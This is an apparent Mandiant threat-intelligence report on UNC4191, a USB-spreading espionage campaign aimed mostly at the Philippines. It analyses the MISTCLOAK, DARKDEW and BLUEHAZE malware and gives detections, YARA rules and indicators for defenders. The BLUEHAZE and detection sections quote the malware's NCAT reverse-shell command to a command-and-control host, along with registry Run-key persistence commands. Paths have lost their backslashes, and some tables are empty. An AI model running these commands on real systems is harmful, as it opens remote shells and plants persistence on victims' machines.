Always Another Secret: Lifting the Haze on China-nexus Espionage in Southeast Asia | Mandiant

Mandiant Managed Defense recently identified cyber espionage activity that heavily leverages USB devices as an initial infection vector and concentrates on the Philippines. Mandiant tracks this activity as UNC4191 and we assess it has a China nexus.

UNC4191 operations have affected a range of public and private sector entities primarily in Southeast Asia and extending to the U.S., Europe, and APJ; however, even when targeted organizations were based in other locations, the specific systems targeted by UNC4191 were also found to be physically located in the Philippines.

Following initial infection via USB devices, the threat actor leveraged legitimately signed binaries to side-load malware, including three new families we refer to as MISTCLOAK, DARKDEW, and BLUEHAZE. Successful compromise led to the deployment of a renamed NCAT binary and execution of a reverse shell on the victim’s system, providing backdoor access to the threat actor. The malware self-replicates by infecting new removable drives that are plugged into a compromised system, allowing the malicious payloads to propagate to additional systems and potentially collect data from air-gapped systems.

Mandiant Managed Defense performs continuous threat hunting for customers, discovering evidence of new tactics, techniques, and procedures (TTPs) that can evade traditional detection mechanisms 

In response to this campaign, Mandiant deployed new real-time detections, enhancing Managed Defense’s protection for our customers from future similar activity. Our Adversary Operations team created and deployed YARA rules and Mandiant Security Validation Actions, shared at the end of the post. This blog post details our initial threat hunting discovery, the newly identified malware families, detection opportunities, and Mandiant’s assessment about the goals and motivations of the threat actor.

Malware Observed

Mandiant observed UNC4191 deploy the following malware families.

Table 1: UNC4191 Malware Families

Malware Family



MISTCLOAK is a launcher written in C++ that executes an encrypted executable payload stored in a file on disk.


BLUEHAZE is a launcher written in C/C++ that launches a copy of NCAT to create a reverse shell to a hardcoded command and control (C2).


DARKDEW is a dropper written in C++ that is capable of infecting removable drives.


NCAT is a command-line networking utility that was written for the Nmap Project to perform a wide-variety of security and administration tasks. While NCAT may be used for legitimate purposes, threat actors may also use it to upload or download files, create backdoors or reverse shells, and tunnel traffic to evade network controls.

Initial Detection

Mandiant Managed Defense customers receive Mandiant’s dedicated proactive Threat Hunting service. Mandiant’s threat hunting team leverages the MITRE ATT&CK® framework as a guide for developing Hunt Missions that examine endpoint telemetry data, such as process events, for collection and ATT&CK technique ID tagging. The resulting threat hunting data set provides the team with wide visibility across the customer base. When performing analysis, we augment this data set with more targeted sources, like custom, real-time alerting from our customers’ endpoint detection and response (EDR) technologies.

Mandiant uses custom tooling to identify ATT&CK technique sequences and clusters associated with common threat actor behaviors. A technique sequence is useful for identifying events with a defined order of execution, such as the creation of a local account (T1136.001) and then addition to the local Administrators group (T1098). A technique cluster identifies a grouping of techniques that don’t necessarily occur in a specific order. By focusing on technique sequences and clusters, we reduce the amount of data that needs to be manually reviewed by analysts.

For example, Mandiant has observed threat actors enumerating domain trusts (T1482) and querying domain and local group permissions (T1069.001, T1069.002) within a several minute span (Figure 1). The combined event count for these three techniques occurring on their own can number in the hundreds of thousands, but by applying technique sequencing or clustering we can reduce the number of interesting events to a manageable amount.

Visualization of technique sequencing and clustering concepts
Figure 1: Visualization of technique sequencing and clustering concepts

Mandiant identified this UNC4191 campaign by searching for anomalous sequences of events under our “Mandiant Intelligence: Staging Directories” and “Command and Scripting Interpreter: Windows Command Shell (T1059.003)” hunting missions (Figure 2).

Technique sequence that led to UNC4191 detection
Figure 2: Technique sequence that led to UNC4191 detection

The techniques performed by UNC4191 led to the development of additional technique sequences and detection opportunities, as described in the Detection Opportunities section.

UNC4191 Malware Infection Cycle

The overall infection cycle from this campaign can be split into three distinct phases, shown in Figure 3.

Figure 3: UNC4191 malware infection cycle
Figure 3: UNC4191 malware infection cycle


The infection chain begins when a user plugs in a compromised removable device and manually executes a renamed signed binary from the root directory of the storage volume (T1091). The initial binaries—named Removable Drive.exe or USB Drive.exe—are versions of a legitimately signed application called USB Network Gate, developed by the company Electronic Team, Inc. These are used to side-load the MISTCLOAK malware that impersonates a legitimate DLL (Table 2).

Table 2: Legitimate USB Network Gate binaries used to side-load MISTCLOAK malware

MD5: f45726a9508376fdd335004fca65392a 

File Name(s): D:Removable Disk.exe, D:USB Drive.exe 

Signature Subject: Electronic Team, Inc 

Product Name: USB Network Gate 

Original File Name: UsbConfig.exe 

MD5: 707de51327f6cae5679dee8e4e2202ba 

File Name(s): D:Removable Disk.exe, D:USB Drive.exe 

Signature Subject: Electronic Team, Inc 

Product Name: USB Network Gate  

Original File Name: UsbConfig.exe 

The renamed USB Network Gate binaries load a MISTCLOAK DLL named u2ec.dll from the execution directory on the removable device (T1574.002) (Table 3). MISTCLOAK is a launcher for the encrypted file usb.ini, which MISTCLOAK reads from the current directory or the path autorun.infProtection for AutorunSystem Volume Informationusb.ini. Mandiant identified the PDB file path G:projectAPTU盘劫持newshellcodeReleaseshellcode.pdb in the MISTCLOAK sample. Notably, the Chinese characters 盘劫持 translate to “disk hijacking”.

Table 3: MISTCLOAK malware metadata

MD5: 7753da1d7466f251b60673841a97ac5a 

File Name: u2ec.dll 

Compile Time: 2021-09-01T09:23:30Z 

Exports: u2ec.dll 

Size: 82,944 

PDB filename: G:projectAPTU盘劫持newu2ecReleaseu2ec.pdb (G:projectAPTU Disk Hijackingnewu2ecReleaseu2ec.pdb) 

MISTCLOAK then opens Windows Explorer to the location on the removable device where the user files are stored with the command ‘explorer.exe  “<drive>:autorun.infProtection for Autorun”’.


The file usb.ini contains an encrypted DLL payload called DARKDEW that is capable of infecting removable drives. If executed from a removable drive, DARKDEW will launch explorer.exe via `explorer.exe “<drive>:autorun.infProtection for Autorun”` where <drive> is a removable drive letter, such as “E”. DARKDEW will then check if either C:ProgramDataudiskdisk_watch.exe or   C:ProgramDataudiskDateCheck.exe exist and will create the directory C:ProgramDataudisk if neither are found.

Table 4: DARKDEW malware metadata

MD5: 6900cf5937287a7ae87d90a4b4b4dec5 

File Name: N/A 

Compile Time: 2021-09-09T08:45:31Z 

Exports: N/A 

Size: 123,904 

PDB filename: G:projectAPTU盘劫持newshellcodeReleaseshellcode.pdb 

DARKDEW then proceeds to copy every file from <drive>:autorun.infProtection for AutorunSystem Volume Information to C:ProgramDataudisk. Mandiant identified files in this directory, such as Removable Drive (16GB).lnk, that originated from a system that was previously compromised by DARKDEW (T1074.001) and copied to a USB device. The copied data includes the files shown in Table 5 and arbitrary files with the extensions: xlsx, docx, mp4, device, jpg, pptx, pdf, txt, and lnk files.

Table 5: Files that are copied by DARKDEW from the removable drive to a compromised system



C:ProgramDataudiskRemovable Disk.exe 





C:ProgramDataudiskUSB Drive.exe 







DARKDEW will then copy the renamed USB Network Gate binary (e.g., Removable Drive.exe) to C:ProgramDataudiskdisk_watch.exe and create persistence with a registry key value named udisk under HKCUSoftwareMicrosoftWindowsCurrentVersionRun (T1547.001). Finally, DARKDEW will launch a file named C:ProgramDataudiskDateCheck.exe and then exit.

Table 6: DARKDEW registry persistence

Key: HKCUSoftwareMicrosoftWindowsCurrentVersionRun 

Value: udisk 

Text: c:programdataudiskdisk_watch.exe 

If DARKDEW is executed from a non-removable drive, the behavior is slightly different. DARKDEW will create the directory C:ProgramDataudisk, then copy every file in the current directory of the parent executable to C:ProgramDataudisk. It will then copy the parent executable to C:ProgramDataudiskdisk_watch.exe and launch it. The persistence mechanism is identical, and it will also launch C:ProgramDataudiskDateCheck.exe. 

When DARKDEW is executed within the context of disk_watch.exe, the malware will scan the system every 10 seconds for removable drives by enumerating volumes from A to Z until it finds one that is removable. The DARKDEW malware then creates the directory <drive>autorun.infProtection for Autorun, sets its attribute to hidden, and copies the contents of the current working directory of disk_watch.exe to that directory or the subdirectory <drive>:autorun.infProtection for AutorunSystem Volume Information. This capability appears to be a method for self-replication and to transfer files that may be collected from air-gapped systems. 


The binary DateCheck.exe is a renamed version of a legitimate, signed application called Razer Chromium Render Process by Razer USA Ltd. (Table 7).

Table 7: Legitimate Razer USA Ltd. binary used to side-load BLUEHAZE malware

MD5: ea7f5b7fdb1e637e4e73f6bf43dcf090 

File Name(s): DateCheck.exe 

Signature Subject: Razer USA Ltd. 

Product Name: Razer Chromium Render Process 

Original File Name: RzCefRenderProcess.exe 

The renamed Razor application, DateCheck.exe, loads the legitimate file rzlog4cpp_logger.dll, which calls the getRoot function from the BLUEHAZE malware RzLog4CPP.dll during C runtime startup (T1574.002).

Table 8: BLUEHAZE malware metadata

MD5: f632e4b9d663d69edaa8224a43b59033 

File Name: RzLog4CPP.dll 

Compile Time: 2021-09-09T09:27:12Z 

Exports: log4cpp.dll 

Size: 201,216 

PDB filename: N/A 

BLUEHAZE will create a new directory called C:UsersPublicLibrariesCNNUDTV, then it will create the registry key value ACNTV under HKCUSoftwareMicrosoftWindowsCurrentVersionRun (T1547.001) for persistence. Next, BLUEHAZE copies all the files from its working directory to C:UsersPublicLibrariesCNNUDTV and then executes a renamed NCAT executable wuwebv.exe to create a reverse shell to the hard-coded command and control (C2) address: closed[.]theworkpc[.]com:80 (T1059). Mandiant has not observed evidence of reverse shell interaction; however, based on the age of the activity, this may be a result of visibility gaps or short log retention periods.

Table 9: BLUEHAZE command execution

DateCheck.exe > 

“cmd.exe /C reg add HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v ACNTV /t REG_SZ /d “Rundll32.exe SHELL32.DLL,ShellExec_RunDLL “C:UsersPublicLibrariesCNNUDTVDateCheck.exe”” /f” 

cmd.exe /c copy *.* C:UsersPublicLibrariesCNNUDTV” 

cmd.exe /C wuwebv.exe -t -e c:windowssystem32cmd.exe closed.theworkpc[.]com 80 

Outlook and Implications

Based on available data, such as PE compile timestamps for the malware involved in the aforementioned activity, this campaign potentially extends back to September 2021. Given the worming nature of the malware involved, we may have detected the later stages of this malware’s proliferation.

We believe this activity showcases Chinese operations to gain and maintain access to public and private entities for the purposes of intelligence collection related to China’s political and commercial interests. Our observations suggest that entities in the Philippines are the main target of this operation based on the number of affected systems located in this country that were identified by Mandiant. 

Campaign Tracking 

Mandiant will continue to monitor UNC4191’s campaign and will provide notable and dynamic updates regarding changes in tactics and techniques, the introduction of tools with new capabilities, or the use of new infrastructure to carry out their mission.   

For more insights into how Mandiant tracks this and similar campaigns, see our Threat Campaigns feature within Mandiant Advantage Threat Intelligence.

Detection Opportunities

Each Mandiant threat hunting discovery is evaluated for opportunities to create new real-time detections. These detections help Mandiant identify additional activity across our customers’ environments for rapid escalation and triage analysis and aim to reduce threat actor dwell time. 

Following our initial campaign discovery, we immediately searched the entire Managed Defense customer base for any activity that matched our atomic indicators of interest, including filenames, file paths, file hashes, IP addresses, domains, and other artifacts. This uncovered activity on systems at multiple customers. 

Additionally, we also created or updated real-time Managed Defense detections to identify threat actor methodologies, such as: 

  • Deployment or usage of NETCAT and NCAT reverse shells 

  • Modification of registry Run keys for malware persistence, with arguments configured to execute the Windows binary rundll32.exe 

  • Processes launched from the C:UsersPublicLibraries directory 

By combining Mandiant’s threat intelligence service with Managed Defense’s detection engineering and threat hunting capabilities, we can rapidly identify and provide context around malicious activity. 

Detection Opportunity 


Event Details 

NCAT reverse shell execution arguments 


wuwebv.exe -t -e c:windowssystem32cmd.exe closed.theworkpc[.]com 80 

Parent or grandparent processes executing from Non-C: Drive Root 

T1091, T1036 


D:USB Drive.exe 

Child Processes: 

> explorer.exe  “D:autorun.infProtection for Autorun” 

> c:programdataudiskdisk_watch.exe 

> c:programdataudiskDateCheck.exe 

Grandchild Processes: 

>> “cmd.exe /C reg add HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v ACNTV /t REG_SZ /d “Rundll32.exe SHELL32.DLL,ShellExec_RunDLL “C:UsersPublicLibrariesCNNUDTVDateCheck.exe”” /f” 

>> cmd.exe /c copy *.* C:UsersPublicLibrariesCNNUDTV” 

>> cmd.exe /C wuwebv.exe -t -e c:windowssystem32cmd.exe closed.theworkpc[.]com 80 

Registry Run key persistence for binary in PROGRAMDATA 


Registry Key: HKCUSoftwareMicrosoftWindowsCurrentVersionRun  

Value: udisk  

Text: c:programdataudiskdisk_watch.exe 

Registry Run key executing RunDLL32 command 

T1218.011, T1060 

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v ACNTV /t REG_SZ /d “Rundll32.exe SHELL32.DLL,ShellExec_RunDLL “C:UsersPublicLibrariesCNNUDTVDateCheck.exe”” /f” 

File name of executing process doesn’t match original name 

T1036, T1574.002 

OriginalFileName: UsbConfig.exe 

File Name: Removable Disk.exe, USB Drive.exe 

OriginalFileName: RzCefRenderProcess.exe 

File Name: DateCheck.exe 

Windows Explorer process execution with folder path specified on command line 


Parent Process Path: D:USB Drive.exe 

Process: explorer.exe 

Command Line: explorer.exe  “D:autorun.infProtection for Autorun” 

Mandiant Security Validation Actions 

Organizations can validate their security controls using the following actions with Mandiant Security Validation.




Protected Theater – UNC4191, BLUEHAZE, Execution, Variant #1 


Protected Theater – UNC4191, DARKDEW, Execution, Variant #1 


Command and Control – UNC4191, DNS Query, Variant #1 

YARA Rules


rule M_Hunting_Launcher_MISTCLOAK_1 { 


        author = "Mandiant" 


        $s1 = "CheckUsbService" ascii 

        $s2 = "newu2ecReleaseu2ec.pdb" ascii 

        $s3 = "autorun.infProtection for Autorun" ascii 


        uint16(0) == 0x5a4d and 

        filesize < 200KB and 

        (2 of ($s*)) 


rule M_Hunting_Dropper_DARKDEW_1 { 


        author = "Mandiant" 


        $s1 = "do inroot" ascii 

        $s2 = "disk_watch" ascii 

        $s5 = "G:projectAPT" ascii 

        $s3 = "c:programdataudisk" ascii 

        $s4 = "newshellcodeReleaseshellcode.pdb" ascii 


        filesize < 500KB and 

        (2 of ($s*)) 


rule M_Hunting_Launcher_BLUEHAZE_1 { 


        author = "Mandiant" 


        $s1 = "LibrariesCNNUDTV" ascii 

        $s2 = "" ascii 

        $s3 = "cmd.exe /C wuwebv.exe -t -e" ascii 


        uint16(0) == 0x5a4d and 

        filesize < 500KB and 

        (2 of ($s*)) 

Indicators of Compromise












DARKDEW (usb.ini file) 



DARKDEW (decrypted payload) 









USB Network Gate (Legitimate Binary used for DLL Side-Loading) 



USB Network Gate (Legitimate Binary used for DLL Side-Loading) 



Razer Chromium Render Process (Legitimate Binary used for DLL Side-Loading) 

File Path 


File and Malware Staging 

File Path 


File and Malware Staging 


Special thanks to Tobias Krueger and Conor Quigley for their assistance with analyzing the MISTCLOAK, DARKDEW, and BLUEHAZE samples and Matthew Hoerger for creating Mandiant Security Validation (MSV) actions. We would also like to thank Tim Martin, Alexander Pennino, Nick Richard, and Sarah Hawley for their technical review and feedback.
